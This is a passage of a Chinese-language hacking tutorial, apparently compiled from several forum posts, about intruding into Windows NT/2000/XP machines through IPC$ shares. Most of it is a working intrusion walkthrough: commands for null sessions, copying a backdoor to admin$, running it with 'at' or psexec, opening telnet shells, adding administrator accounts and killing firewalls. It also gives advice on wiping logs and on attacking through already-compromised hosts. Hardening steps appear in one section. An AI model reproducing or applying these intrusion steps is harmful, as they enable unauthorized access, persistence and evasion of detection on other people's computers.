工具实现,但需要相应的权限),这往往是入侵成败的关键。如果不考虑这些,仅从传

送文件这一方面,ipc管道已经给了入侵者莫大的支持,甚至已经成为了最重要的传输手

段,因此你总能在各大论坛上看到一些朋友因为打不开目标机器的ipc管道而一筹莫展大

呼救命。当然,我们也不能忽视权限在ipc 管道中扮演的重要角色,想必你一定品尝过

空会话的尴尬,没有权限,开启管道我们也无可奈何。但入侵者一旦获得了管理员的权

限,那么ipc管道这把双刃剑将显示出它狰狞的一面。


七 ipc$连接失败的常见原因
以下是一些常见的导致ipc$连接失败的原因:

1 IPC连接是Windows NT及以上系统中特有的功能,由于其需要用到Windows NT中很多

DLL函数,所以不能在Windows 9.x/Me系统中运行,也就是说只有nt/2000/xp才可以相互

建立ipc$连接,98/me是不能建立ipc$连接的;


2 如果想成功的建立一个ipc$连接,就需要响应方开启ipc$共享,即使是空连接也是这

样,如果响应方关闭了ipc$共享,将不能建立连接;


3 连接发起方未启动Lanmanworkstation服务(显示名为:Workstation):它提供网络

链结和通讯,没有它发起方无法发起连接请求;


4 响应方未启动Lanmanserver服务(显示名为:Server):它提供了 RPC 支持、文件、

打印以及命名管道共享,ipc$依赖于此服务,没有它主机将无法响应发起方的连接请求

,不过没有它仍可发起ipc$连接;


5 响应方未启动NetLogon,它支持网络上计算机 pass-through 帐户登录身份(不过这

种情况好像不多);


6 响应方的139,445端口未处于监听状态或被防火墙屏蔽;


7 连接发起方未打开139,445端口;


8 用户名或者密码错误:如果发生这样的错误,系统将给你类似于'无法更新密码'这样

的错误提示(显然空会话排除这种错误);


9 命令输入错误:可能多了或少了空格,当用户名和密码中不包含空格时两边的双引号

可以省略,如果密码为空,可以直接输入两个引号""即可;


10 如果在已经建立好连接的情况下对方重启计算机,那么ipc$连接将会自动断开,需要

重新建立连接。


另外,你也可以根据返回的错误号分析原因:

错误号5,拒绝访问:很可能你使用的用户不是管理员权限的;
错误号51,Windows无法找到网络路径:网络有问题;
错误号53,找不到网络路径:ip地址错误;目标未开机;目标lanmanserver服务未启动

;目标有防火墙(端口过滤);
错误号67,找不到网络名:你的lanmanworkstation服务未启动或者目标删除了ipc$;
错误号1219,提供的凭据与已存在的凭据集冲突:你已经和对方建立了一个ipc$,请删

除再连;
错误号1326,未知的用户名或错误密码:原因很明显了;
错误号1792,试图登录,但是网络登录服务没有启动:目标NetLogon服务未启动;
错误号2242,此用户的密码已经过期:目标有帐号策略,强制定期要求更改密码。


八 复制文件失败的原因
有些朋友虽然成功的建立了ipc$连接,但在copy时却遇到了这样那样的麻烦,无法复制

成功,那么导致复制失败的常见原因又有哪些呢?


1 对方未开启共享文件夹
这类错误出现的最多,占到50%以上。许多朋友在ipc$连接建立成功后,甚至都不知道对

方是否有共享文件夹,就进行盲目复制,结果导致复制失败而且郁闷的很。因此我建议

大家在进行复制之前务必用net view //IP这个命令看一下你想要复制的共享文件夹是否

存在(用软件查看当然更好),不要认为能建立ipc$连接就一定有共享文件夹存在。


2 向默认共享复制失败
这类错误也是大家经常犯的,主要有两个小方面:

1)错误的认为能建立ipc$连接的主机就一定开启了默认共享,因而在建立完连接之后马

上向c$,d$,admin $之类的默认共享复制文件,一旦对方未开启默认共享,将导致复制失

败。ipc$连接成功只能说明对方打开了ipc$共享,并不能说明默认共享一定存在。 ipc$

共享与默认共享是两码事,ipc$共享是一个命名管道,并不是哪个实际的文件夹,而默

认共享却是实实在在的共享文件夹;

2)由于 net view //IP 这个命令无法显示默认共享文件夹(因为默认共享带$),因此

通过这个命令,我们并不能判断对方是否开启了默认共享,因此如果对方未开启默认共

享,那么所有向默认共享进行的操作都不能成功;(不过大部分扫描软件在扫弱口令的

同时,都能扫到默认共享目录,可以避免此类错误的发生)

要点:请大家一定区分ipc共享,默认共享,普通共享这三者的区别:ipc共享是一个管

道,并不是实际的共享文件夹;默认共享是安装时默认打开的文件夹;普通共享是我们

自己开启的可以设置权限的共享文件夹。


3用户权限不够,包括四种情形:
1)空连接向所有共享(默认共享和普通共享)复制时,权限是不够的;
2)向默认共享复制时,在Win2000 Pro版中,只有Administrators和Backup Operators

组成员才可以,在Win2000 Server版本 Server Operatros组也可以访问到这些共享目录


3)向普通共享复制时,要具有相应权限(即对方管理员事先设定的访问权限);
4)对方可以通过防火墙或安全软件的设置,禁止外部访问共享;

注意:
1 不要认为administrator就一定具有管理员权限,管理员名称是可以改的
2 管理员可以访问默认共享的文件夹,但不一定能够访问普通的共享文件夹,因为管理

员可以对普通的共享文件夹进行访问权限设置,如图6,管理员为D盘设置的访问权限为

仅允许名为xinxin的用户对该文件夹进行完全访问,那么此时即使你拥有管理员权限,

你仍然不能访问D盘。不过有意思的是,如果此时对方又开启了D$的默认共享,那么你却

可以访问D$,从而绕过了权限限制,有兴趣的朋友可以自己做测试。


4被防火墙杀死或在局域网
还有一种情况,那就是也许你的复制操作已经成功,但当远程运行时,被防火墙杀掉了

,导致找不到文件;或者你把木马复制到了局域网内的主机,导致连接失败(反向连接

的木马不会发生这种情况)。如果你没有想到这种情况,你会以为是复制上出了问题,

但实际你的复制操作已经成功了,只是运行时出了问题。


呵呵,大家也知道,ipc$连接在实际操作过程中会出现各种各样的问题,上面我所总结

的只是一些常见错误,没说到的,大家可以给我提个醒儿。


九 关于at命令和xp对ipc$的限制
本来还想说一下用at远程运行程序失败的原因,但考虑到at的成功率不是很高,问题也

很多,在这里就不提它了(提的越多,用的人就越多),而是推荐大家用 psexec.exe远

程运行程序,假设想要远程机器执行本地c:/xinxin.exe文件,且管理员为

administrator,密码为1234,那么输入下面的命令:
psexec //ip -u administrator -p 1234 -c c:/xinxin.exe
如果已经建立ipc连接,则-u -p这两个参数不需要,psexec.exe将自动拷贝文件到远程

机器并运行。

本来xp中的ipc$也不想在这里讨论,想单独拿出来讨论,但看到越来越多的朋友很急切

的提问为什么遇到xp的时候,大部分操作都很难成功。我在这里就简单提一下吧,在xp

的默认安全选项中,任何远程访问仅被赋予来宾权限,也就是说即使你是用管理员帐户

和密码,你所得到的权限也只是Guest,因此大部分操作都会因为权限不够而失败,而且

到目前为止并没有一个好的办法来突破这一限制。所以如果你真的得到了xp的管理员密

码,我建议你尽量避开ipc管道。


十 如何打开目标的IPC$共享以及其他共享
目标的ipc$不是轻易就能打开的,否则就要天下打乱了。你需要一个admin权限的shell

,比如telnet,木马,cmd重定向等,然后在shell下执行:
net share ipc$
开放目标的ipc$共享;
net share ipc$ /del
关闭目标的ipc$共享;如果你要给它开共享文件夹,你可以用:
net share xinxin=c:/
这样就把它的c盘开为共享名为xinxin共享文件夹了。(可是我发现很多人错误的认为开

共享文件夹的命令是net share c$,还大模大样的给菜鸟指指点点,真是误人子弟了)

。再次声明,这些操作都是在shell下才能实现的。


十一 一些需要shell才能完成的命令
看到很多教程这方面写的十分不准确,一些需要shell才能完成命令就简简单单的在ipc$

连接下执行了,起了误导作用。那么下面我总结一下需要在shell才能完成的命令:

1 向远程主机建立用户,激活用户,修改用户密码,加入管理组的操作需要在shell下完

成;

2 打开远程主机的ipc$共享,默认共享,普通共享的操作需要在shell下完成;

3 运行/关闭远程主机的服务,需要在shell下完成;

4 启动/杀掉远程主机的进程,也需要在shell下完成(用软件的情况下除外,如pskill

)。


十二 入侵中可能会用到的命令
为了这份教程的完整性,我列出了ipc$入侵中的一些常用命令,如果你已经掌握了这些

命令,你可以跳过这一部分看下面的内容。请注意这些命令是适用于本地还是远程,如

果只适用于本地,你只能在获得远程主机的shell(如cmd,telnet等)后,才能向远程

主机执行。


1 建立/删除ipc$连接的命令

1)建立空连接:
net use //127.0.0.1/ipc$ "" /user:""

2)建立非空连接:
net use //127.0.0.1/ipc$ "密码" /user:"用户名"

3)删除连接:
net use //127.0.0.1/ipc$ /del


2 在ipc$连接中对远程主机的操作命令

1) 查看远程主机的共享资源(看不到默认共享):
net view //127.0.0.1

2) 查看远程主机的当前时间:
net time //127.0.0.1

3) 得到远程主机的netbios用户名列表:
nbtstat -A 127.0.0.1

4)映射/删除远程共享:
net use z: //127.0.0.1/c
此命令将共享名为c的共享资源映射为本地z盘

net use z: /del
删除映射的z盘,其他盘类推

5)向远程主机复制文件:
copy 路径/文件名 //IP/共享目录名,如:
copy c:/xinxin.exe //127.0.0.1/c$ 即将c盘下的xinxin.exe复制到对方c盘内
当然,你也可以把远程主机上的文件复制到自己的机器里:
copy //127.0.0.1/c$/xinxin.exe c:/

6)远程添加计划任务:
at //IP 时间 程序名 如:
at //127.0.0.0 11:00 xinxin.exe
注意:时间尽量使用24小时制;如果你打算运行的程序在系统默认搜索路径(比如

system32/)下则不用加路径,否则必须加全路径


3 本地命令

1)查看本地主机的共享资源(可以看到本地的默认共享)
net share

2)得到本地主机的用户列表
net user

3)显示本地某用户的帐户信息
net user 帐户名

4)显示本地主机当前启动的服务
net start

5)启动/关闭本地服务
net start 服务名
net stop 服务名

6)在本地添加帐户
net user 帐户名 密码 /add

7)激活禁用的用户
net uesr 帐户名 /active:yes

8)加入管理员组
net localgroup administrators 帐户名 /add

很显然的是,虽然这些都是本地命令,但如果你在远程主机的shell中输入,比如你

telnet成功后输入上面这些命令,那么这些本地输入将作用在远程主机上。


4 其他一些命令
1)telnet
telnet IP 端口
telnet 127.0.0.0 23

2)用opentelnet.exe开启远程主机的telnet
OpenTelnet.exe //ip 管理员帐号 密码 NTLM的认证方式 port
OpenTelnet.exe //127.0.0.1 administrator "" 1 90
不过这个小工具需要满足四个要求:
1)目标开启了ipc$共享
2)你要拥有管理员密码和帐号
3)目标开启RemoteRegistry服务,用户就可以更改ntlm认证
4)对仅WIN2K/XP有效

3)用psexec.exe一步获得shell,需要ipc管道支持
psexec.exe //IP -u 管理员帐号 -p 密码 cmd
psexec.exe //127.0.0.1 -u administrator -p "" cmd


十三 对比过去和现今的ipc$入侵
既然是对比,那么我就先把过去的ipc$入侵步骤写给大家,都是蛮经典的步骤:

[1]
C:/>net use //127.0.0.1/ipc$ "" /user:admintitrators
//用扫到的空口令建立连接  

[2]
c:/>net view //127.0.0.1
//查看远程的共享资源

[3]
C:/>copy srv.exe //127.0.0.1/admin$/system32
//将一次性后门srv.exe复制到对方的系统文件夹下,前提是admin$开启  

[4]
C:/>net time //127.0.0.1
//查看远程主机的当前时间

[5]
C:/>at //127.0.0.1 时间 srv.exe
//用at命令远程运行srv.exe,需要对方开启了'Task Scheduler'服务  

[6]
C:/>net time //127.0.0.1
//再次查看当前时间来估算srv.exe是否已经运行,此步可以省略

[7]    
C:/>telnet 127.0.0.1 99
//开一个新窗口,用telnet远程登陆到127.0.0.1从而获得一个shell(不懂shell是什么

意思?那你就把它想象成远程机器的控制权就好了,操作像DOS),99端口是srv.exe开的

一次性后门的端口  

[8]
C:/WINNT/system32>net start telnet
//我们在刚刚登陆上的shell中启动远程机器的telnet服务,毕竟srv.exe是一次性的后

门,我们需要一个长久的后门便于以后访问,如果对方的telnet已经启动,此步可省略

[9]
C:/>copy ntlm.exe //127.0.0.1/admin$/system32
//在原来那个窗口中将ntlm.exe传过去,ntlm.exe是用来更改telnet身份验证的  

[10]
C:/WINNT/system32>ntlm.exe
//在shell窗口中运行ntlm.exe,以后你就可以畅通无阻的telnet这台主机了
  
[11]
C:/>telnet 127.0.0.1 23
//在新窗口中telnet到127.0.0.1,端口23可省略,这样我们又获得一个长期的后门

[12]
C:/WINNT/system32>net user 帐户名 密码 /add
C:/WINNT/system32>net uesr guest /active:yes
C:/WINNT/system32>net localgroup administrators 帐户名 /add
//telnet上以后,你可以建立新帐户,激活guest,把任何帐户加入管理员组等

好了,写到这里我似乎回到了2,3年前,那时的ipc$大家都是这么用的,不过随着新工

具的出现,上面提到的一些工具和命令现在已经不常用到了,那就让我们看看现在的高

效而简单的ipc$入侵吧。

[1]
psexec.exe //IP -u 管理员帐号 -p 密码 cmd
//用这个工具我们可以一步到位的获得shell

OpenTelnet.exe //server 管理员帐号 密码 NTLM的认证方式 port
//用它可以方便的更改telnet的验证方式和端口,方便我们登陆

[2]
已经没有第二步了,用一步获得shell之后,你做什么都可以了,安后门可以用winshell

,克隆就用ca吧,开终端用3389.vbe,记录密码用win2kpass,总之好的工具不少,随你

选了,我就不多说了。


十四 如何防范ipc$入侵察看本地共享资源
运行-cmd-输入net share
删除共享(每次输入一个)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,……可以继续删除)

1 禁止空连接进行枚举(此操作并不能阻止空连接的建立)

运行regedit,找到如下主键

[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/LSA]把RestrictAnonymous

= DWORD的键值改为:1
如果设置为"1",一个匿名用户仍然可以连接到IPC$共享,但无法通过这种连接得到列举

SAM帐号和共享信息的权限;在Windows 2000 中增加了"2",未取得匿名权的用户将不能

进行ipc$空连接。建议设置为1。如果上面所说的主键不存在,就新建一个再改键值。如

果你觉得改注册表麻烦,可以在本地安全设置中设置此项: 在本地安全设置-本地策略

-安全选项-'对匿名连接的额外限制'


2 禁止默认共享

1)察看本地共享资源
运行-cmd-输入net share

2)删除共享(重起后默认共享仍然存在)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,……可以继续删除)

3)停止server服务
net stop server /y (重新启动后server服务会重新开启)

4)禁止自动打开默认共享(此操作并不能关闭ipc$共享)
运行-regedit

server 版:找到如下主键[HKEY_LOCAL_MACHINE/SYSTEM/

CurrentControlSet/Services/LanmanServer/Parameters]把AutoShareServer (DWORD

)的键值改为:00000000。

pro版:找到如下主键

[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/LanmanServer/Parameters

]把AutoShareWks(DWORD)的键值改为:00000000。
这两个键值在默认情况下在主机上是不存在的,需要自己手动添加,修改后重起机器使

设置生效。


3 关闭ipc$和默认共享依赖的服务:server服务
如果你真的想关闭ipc$共享,那就禁止server服务吧:
控制面板-管理工具-服务-找到server服务(右击)-属性-常规-启动类型-选已禁用,这

时可能会有提示说:XXX服务也会关闭是否继续,因为还有些次要的服务要依赖于server

服务,不要管它。


4 屏蔽139,445端口
由于没有以上两个端口的支持,是无法建立ipc$的,因此屏蔽139,445端口同样可以阻

止ipc$入侵。

1)139端口可以通过禁止NBT来屏蔽
本地连接-TCP/IT属性-高级-WINS-选‘禁用TCP/IT上的NETBIOS’一项

2)445端口可以通过修改注册表来屏蔽
添加一个键值
Hive: HKEY_LOCAL_MACHINE
Key: System/Controlset/Services/NetBT/Parameters
Name: SMBDeviceEnabled
Type: REG_DWORD
Value: 0
修改完后重启机器
注意:如果屏蔽掉了以上两个端口,你将无法用ipc$入侵别人。

3)安装防火墙进行端口过滤


6 设置复杂密码,防止通过ipc$穷举出密码,我觉得这才是最好的办法,增强安全意识

,比不停的打补丁要安全的多。


十五 ipc$入侵问答精选
1.进行ipc$入侵的时候,会在服务器中留下记录,有什么办法可以不让服务器发现吗?

答:留下记录是一定的,你走后用清除日志程序删除就可以了,或者用肉鸡入侵。


2.你看下面的情况是为什么,可以连接但不能复制
net use //***.***.***.***/ipc$ "密码" /user:"用户名"
命令成功
copy icmd.exe //***.***.***.***/admin$
找不到网络路径
命令不成功

答:像“找不到网络路径”“找不到网络名”之类的问题,大多是因为你想要复制到的

共享文件夹没有开启,所以在复制的时候会出现错误,你可以试着找找其他的共享文件

夹。


3.如果对方开了IPC$,且能建立空联接,但打开C、D盘时,都要求密码,我知道是空连

接没有太多的权限,但没别的办法了吗?

答:建议先用流光或者别的什么扫描软件试着猜解一下密码,如果猜不出来,只能放弃

,毕竟空连接的能力有限。


4.我已经猜解到了管理员的密码,且已经ipc$连接成功了,但net view //ip发现它没开

默认共享,我该怎么办?

答:首先纠正你的一个错误,用net view //ip是无法看到默认共享的,你可以试着将文

件复制到c$,d$看看,如果都不行,说明他关闭了默认共享,那你就用opentelnet.exe

或psexec.exe吧,用法上面有。


5.ipc$连接成功后,我用下面的命令建立了一个帐户,却发现这个帐户在我自己的机器

上,这是怎么回事?
net uset ccbirds /add

答:ipc$建立成功只能说明你与远程主机建立了通信隧道,并不意味你取得了一个shell

,只有在获得一个shell(比如telnet)之后,你才能在远程机器建立一个帐户,否则你

的操作只是在本地进行。


6.我已进入了一台肉机,用的管理员帐号,可以看他的系统时间,但是复制程序到他的

机子上却不行,每次都提示“拒绝访问,已复制0个文件”,是不是对方有什么服务没开

,我该怎么办?

答:一般来说“拒绝访问”都是权限不够的结果,可能是你用的帐户有问题,还有一种

可能,如果你想向普通共享文件夹复制文件却返回这个错误,说明这个文件夹设置的允

许访问用户中不包括你(哪怕你是管理员),这一点我在上一期文章中分析了。


7.我用Win98能与对方建立ipc$连接吗?

答:理论上不可以,要进行ipc$的操作,建议用win2000,用其他操作系统会带来许多不

必要的麻烦。


8.我用net use //ip/ipc$ "" /user ""成功的建立了一个空会话,但用nbtstat -A IP

却无法导出用户列表,这是为什么?

答:空会话在默认的情况下是可以导出用户列表的,但如果管理员通过修改注册表来禁

止导出列表,就会出现你所说的情况;还有可能是你自己的NBT没有打开,netstat命令

是建立在NBT之上的。  


9.我建立ipc$连接的时候返回如下信息:‘提供的凭据与已存在的凭据集冲突’,怎么

回事?

答:呵呵,这说明你已经与目标主机建立了ipc$连接,两个主机间同时建立两个ipc$连

接是不允许的。


10.我在映射的时候出现:
F:/>net use h: //211.161.134.*/e$
系统发生 85 错误。
本地设备名已在使用中。这是怎么回事?

答:你也太粗心了吧,这说明你有一个h盘了,映射到没有的盘符吧!


11.我建立了一个连接f:/>net use //*.*.*.*/ipc$ "123" /user:"guest" 成功了,但

当我映射时出现了错误,向我要密码,怎么回事?
F:/>net use h: //*.*.*.*/c$
密码在 //*.*.*.*/c$ 无效。
请键入 //*.*.*.*/c$ 的密码:
系统发生 5 错误。
拒绝访问。

答:呵呵,向你要密码说明你当前使用的用户权限不够,不能映射C$这个默认共享,想

办法提升权限或者找管理员的弱口令吧!默认共享一般是需要管理员权限的。


12.我用superscan扫到了一个开了139端口的主机,但为什么不能空连接呢?

答:你混淆了ipc$与139的关系,能进行ipc$连接的主机一定开了139或445端口,但开这

两个端口的主机可不一定能空连接,因为对方可以关闭ipc$共享.


13.我门局域网里的机器大多都是xp,我用流光扫描到几个administrator帐号口令是空

,而且可以连接,但不能复制东西,说错误5。请问为什么?

答:xp的安全性要高一些,在安全策略的默认设置中,对本地帐户的网络登录进行身份

验证的时候,默认为来宾权限,即使你用管理员远程登录,也只具有来宾权限,因此你

复制文件,当然是错误5:权限不够。


14.我用net use //192.168.0.2/ipc$ "password" /user:"administrator" 成功,可是

net use i: //192.168.0.2/c
出现请键入 //192.168.0.2 的密码,怎么回事情呢?我用的可是管理员呀?应该什么都

可以访问呀?

答:虽然你具有管理员权限,但管理员在设置c盘共享权限时(注意:普通共享可以设置

访问权限,而默认共享则不能)可能并未设置允许administrator访问,所以会出现上述

问题。


15.如果自己的机器禁止了ipc$, 是不是还可以用ipc$连接别的机器?如果禁止server服

务呢?

答:禁止以上两项仍可以发起ipc$连接,不过这种问题自己动手试验会更好。


16.能告诉我下面的两个错误产生的原因吗?
c:/>net time //61.225.*.*
系统发生 5 错误。
拒绝访问。

c:/>net view //61.225.*.*
系统发生 5 错误。
拒绝访问。

答:起初遇到这个问题的时候我也很纳闷,错误5表示权限不够,可是连空会话的权限都

可以完成上面的两个命令,他为什么不行呢?难道是他没建立连接?后来那个粗心的同

志告诉我的确是这样,他忘记了自己已经删了ipc$连接,之后他又输入了上面那两个命

令,随之发生了错误5。


17.您看看这是怎么回事?
F:/>net time
找不到时间服务器。
请键入 NET HELPMSG 3912 以获得更多的帮助。

答:答案很简单,你的命令错了,应该是net time //ip
没输入ip地址,当然找不到服务器。view的命令也应该有ip地址,即:net view //ip

 

------------------------

关于ipc$、空连接和默认共享
简单说明:
    首先需要指出的是空连接和ipc$是不同的概念。空连接是在没有信任的情况下与服

务器建立的会话,换句话说,它是一个到服务器的匿名访问。ipc$是为了让进程间通信

而开放的命名管道,可以通过验证用户名和密码获得相应的权限。有许多的工具必须用

到ipc$。默认共享是为了方便远程管理而开放的共享,包含了所有的逻辑盘(c$,d$,e$

……)和系统目录winnt或windows(admin$)。
相关帖子:
   尝试自己解决问题的学习思路 http://www.sandflee.net/txt/list.asp?id=100
   IPC进攻方法 http://www.sandflee.net/cgi-bin/lb5000/topic.cgi?

forum=1&topic=2498&show=1034
常见问题和回答:
  1,怎样建立空连接,它有什么用?
  答:使用命令 net use /IPipc$ "" /user:"" 就可以简单地和目标建立一个空连接(

需要目标开放ipc$)。
      对于NT,在默认安全设置下,借助空连接可以列举目标用户、共享,访问

everyone权限的共享,访问小部分注册表等,没有什么利用价值。对2000作用就更小了

。而且实现也不方便,需借助工具。如果你不理解“没用”的东西为什么还会存在,就

看看“专业”的解释吧:
      在NT/2000下的空连接 http://www.3389.net/bbs/dispbbs.asp?

boardID=22&RootID=3424&ID=3424&page=1:
      解剖WIN2K下的空会话 http://www.sandflee.net/txt/list.asp?id=117
  2,为什么我连不上IPC$?
  答:1,只有nt/2000/xp及以上系统才可以建立ipc$。如果你用的是98/me是没有该功

能的。
      2,确认你的命令没有打错。正确的命令是: net use /目标IPipc$ "密码"

/user:"用户名"
         注意别多了或少了空格。当用户名和密码中不包含空格时两边的双引号可以省

略。空密码用""表示。
      3,根据返回的错误号分析原因:
         错误号5,拒绝访问 : 很可能你使用的用户不是管理员权限的,先提升权限


         错误号51,Windows 无法找到网络路径 : 网络有问题;
         错误号53,找不到网络路径 : ip地址错误;目标未开机;目标lanmanserver

服务未启动;目标有防火墙(端口过滤);
         错误号67,找不到网络名 : 你的lanmanworkstation服务未启动;目标删除

了ipc$;
         错误号1219,提供的凭据与已存在的凭据集冲突 : 你已经和对方建立了一个

ipc$,请删除再连。
         错误号1326,未知的用户名或错误密码 : 原因很明显了;
         错误号1792,试图登录,但是网络登录服务没有启动 : 目标NetLogon服务未

启动。(连接域控会出现此情况)
         错误号2242,此用户的密码已经过期 : 目标有帐号策略,强制定期要求更改

密码。
      4,关于ipc$连不上的问题比较复杂,本论坛没有总结出一个统一的认识,我在肉

鸡上实验有时会得出矛盾的结论,十分棘手。
         而且知道了问题所在,如果没有用其他办法获得shell,很多问题依然不能解

决。问题过于细致后就不适合在本文章里探讨了。
         各位看着办吧,呵呵。
  3,怎样打开目标的IPC$?
  答:首先你需要获得一个不依赖于ipc$的shell,比如sql的cmd扩展、telnet、木马。

当然,这shell必须是admin权限的。然后你可以使用shell执行命令 net share ipc$ 来

开放目标的ipc$。从上一问题可以知道,ipc$能否使用还有很多条件。请确认相关服务

都已运行,没有就启动它(不知道怎么做的请看net命令的用法)。还是不行的话(比如

有防火墙,杀不了)建议放弃。
  4,怎样映射和访问默认共享?
  答:使用命令 net use z: /目标IPc$ "密码" /user:"用户名" 将对方的c盘映射为自

己的z盘,其他盘类推。
      如果已经和目标建立了ipc$,则可以直接用IP加盘符加$访问。比如 copy

muma.exe /IPd$pathmuma.exe 。或者再映射也可以,只是不用用户名和密码了:net

use y: /IPd$ 。然后 copy muma.exe y:pathmuma.exe 。当路径中包含空格时,须用""

将路径全引住。
  5,如何删除映射和ipc$连接?
  答:用命令 net use /IPipc$ /del 删除和一个目标的ipc$连接。
      用命令 net use z: /del 删除映射的z盘,其他盘类推。
      用命令 net use * /del 删除全部。会有提示要求按y确认。
  6,连上ipc$然后我能做什么?
  答:能使用管理员权限的帐号成功和目标连接ipc$,表示你可以和对方系统做深入“

交流”了。你可以使用各种命令行方式的工具(比如pstools系列、Win2000SrvReskit、

telnethack等)获得目标信息、管理目标的进程和服务等。如果目标开放了默认共享(

没开你就帮他开),你就可以上传木马并运行。也可以用tftp、ftp的办法上传。像

dwrcc、VNC、RemoteAdmin等工具(木马)还具有直接控屏的功能。如果是2000server,

还可以考虑开启终端服务方便控制。这里提到的工具的使用,请看自带的说明或相关教

程。
  7,怎样防止别人用ips$和默认共享入侵我?
  答:A、一种办法是把ipc$和默认共享都删除了。但重起后还会有。这就需要改注册表


        1,先把已有的删除
           net share ipc$ /del
           net share admin$ /del
           net share c$ /del
           …………(有几个删几个)
        2,禁止建立空连接
    首先运行regedit,找到如下主键

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSA]把RestrictAnonymous

(DWORD)的键值改为:00000001。
   3,禁止自动打开默认共享
    对于server版,找到如下主键

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把

AutoShareServer(DWORD)的键值改为:00000000。
           对于pro版,则是

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把

AutoShareWks(DWORD)的键值改为:00000000。
     B、另一种是关闭ipc$和默认共享依赖的服务(不推荐)
           net stop lanmanserver
        可能会有提示说,XXX服务也会关闭是否继续。因为还有些次要的服务依赖于

lanmanserver。一般情况按y继续就可以了。
     C、最简单的办法是设置复杂密码,防止通过ipc$穷举密码。但如果你有其他漏洞

,ipc$将为进一步入侵提供方便。
     D、还有一个办法就是装防火墙,或者端口过滤。防火墙的方法就不说了


---------------------------

ipc$漏洞
 冲击波利用ipc$,震荡波rpc$漏洞
 139.135.445端口
------------------------------
 部分城市的网络供应商(isp)屏蔽啦139.445.135端口。

ipc$连接失败的原因
 ipc$ 连接失败后

经常看一些入侵相关文章的朋友不难发现,好像大部分的入侵都非要用到ipc$连接(事

实上并不是这样),而在许多安全杂志上一提到入侵,无论是在去取得administrator之

前,还是在拿到了administrator之后上传工具,都在频繁的使用到了ipc$。这似乎是一

个很大的缺口,看别人说的好像容易的就像用冰河一样,但事实上,大部分管理员根本

不会给你这种机会,让你去用ipc$为所欲为,管理员会想尽一切办法屏蔽掉这个众人皆

知的漏洞。傻子才会开着共享,等着你去黑呢~~所以也就出现了很多朋友抱怨ipc$连不

上,或者什么什么号错误。从而大大打击了我们学习黑客的热情。我今天就想和大家一

起来看一下ipc$失败的原因和解决的方法。
什么是ipc¥?
我们最好先来看一下什么是ipc¥连接。ipc(internet process connection)是远程网

络连接。而ipc$,admin$,c$,d$,e$这些则是winnt和win2000的默认共享。ipc$就是一种

管道通讯,它在两个ip间建立一个连接。我们一般看到对方主机开了139,445,我们一般

就说对方开了共享。就可以尝试用ipc¥连接。net net use //远程的ip/ipc$

"password" /user:"username"[如图1]
说明:这种功能只在winnt和win2000种才有,windows98是没有的。

很多朋友对ipc¥连接的概念很混淆,我在这里罗嗦几句,ipc¥连接分为ipc$空连接和

带有一定权限ipc$连接,这两者可是大大的不一样,许多朋友在建立了空连接之后,就着

急的想copy工具上去,这是肯定会报错的[如图2],其实这也是很多朋友经常碰到的问题

。因为这是空连接,没有任何的权限(就好像匿名访问一样),除了可以得到远程主机的

netbios信息外,什么命令都执行不了。
而可以复制文件是你获得了一定的权限后,比如说你得到一个管理员密码是空口令,也

就是带有一定权限的ipc$连接,空连接只是简单的和远程主机建立了一个通讯的管道。

是不是什么用都没有呢?当然不是了,我们可以用暴力破解的方法来得到管理员的密码

,就是挂上字典不断地进行对ipc$空连接的试探,从而达到取得管理员密码的目的,最

有名的工具就是小榕的smbcrack.因为不是这次我们说的重点,所以如果大家感兴趣可以

自己到我们的论坛www.itaq.org)看相关文章.
到这里我已经对ipc¥空连接和带有一定权限ipc$连接有了一个比较清楚的了解。

好了,现在我们来自己分析一下ipc$常见的失败原因,我们要用到的只是一台虚拟机,

或者你有自己的肉鸡,或者局域网。我在这里选择虚拟机(原因很简单:省钱~~~别打我

)。
1、错误1326
我们用命令net use //192.168.60.128/ipc$ "12345" /user:"admaninistrator"进行连

接,[如图3]报系统发生1326错误,登陆失败:未知用户名或密码错误。这个错误很常见

哦~~~,我们检查一下我们的命令,发现原来是用户名输入错误。(也可能是你的密码输

入错误)
3、错误53
再次输入net use //192.168.60.128/ipc$ "12345" /user:"admninistrator",报系统

发生错误53错误[如图4],找不到网络名。刚才试找不到路径,现在是找不到网络名。我

们在进肉鸡看一下,查看一下系统进程,原来远程主机(虚拟机)开了防火墙。我们杀

掉这个进程。看一下,连接成功了!
2、错误67
这也是我们经常碰到的,让我们许多刚上路的黑友郁闷不已,我们来试一下,输入命令

net use //192.168.60.128/ipc$ "12345" /user:"admninistrator"报系统发生错误67

错误[如图5],找不到网络路径。我们需要进入我们的虚拟机看一下,查看一下共享,原

来是没开共享,难怪找不到路径。[如图6] 我们可以用net share 打开共享。这样就可

以了,不会报错了。
解决方法
我们现在已经了解了ipc$失败的原因,我们知道稍微有一点安全意识的网络管理员都会

关闭掉共享,不会给你机会用简单的ipc$连接进入他的机子,而如果他屏蔽掉了ipc$共

享并且开了很少的服务(或者根本禁止了许多可以利用的服务),就算你通过某种方法

比如说溢出攻击,得到了权限,进入了系统,这时你添加一个账号也没什么意义。想用

ipc$连接上传工具,却发现连续的报错,错误1326和错误67比较简单,容易对付。如果

碰到对方开了防火墙,也就是(错误67),远程连接不上,我们怎么办呢?这里提供几种

办法,
1、杀掉远程主机中的防火墙,如果对方安装了resouce kit 那么我们就可以用tlist 和

kill 两个命令来找到并且杀掉防火墙的进程。
2、利用tftp。并不是说有的管理员都安装了resouce kit,那我们怎么办呢?我们知道

2000是自带的tftp,我们可以用tftp来上传工具,如tlist 、kill等等,然后关闭防火

墙和杀毒软件
3、利用自己的ftp。我们还可以自己驾一个ftp服务器,然后用远程的计算机反过来ftp

我们自己的机子,达到上传工具的目的。然后杀掉进程...(其实已经没必要了)剩下的

就随你的便了。
其实这篇文章没什么技术性可言,只是针对网上朋友们经常提的一些问题作一个总结性

的回答。希望能给初学者带来一些方便,还有就是希望初学者能明白,许多事情最好自

己试着去做一下,不要光是提问,因为在这个领域内没有什么人可以真正的帮助,只有

你自己!!黑客是什么??不管你问多少人,回答只有一个:黑客是一种精神,一种自

我钻研的
=========================

